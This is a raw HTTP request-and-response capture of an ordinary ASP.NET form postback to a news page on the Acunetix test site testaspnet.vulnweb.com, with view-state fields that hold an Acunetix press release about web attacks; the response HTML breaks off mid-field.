Request Header - size: 422 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=2 Content-Length: 10937 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 10,937 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc%2BQWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BNTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BRmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BJnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc%2BPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk%2BRmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk%2BPGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk%2BIDwvdWw%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc%2BPC9wPiAgICAgPHA%2BVXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjZGRk4%2B8K4F%2F0js11lBw12IN%2FOFdqHcc%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwKpz%2FfHDgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBHLN3myVVFzWOQRRF0fUO8vWuGWI
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 30581
Response Body - size: 30,581 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgI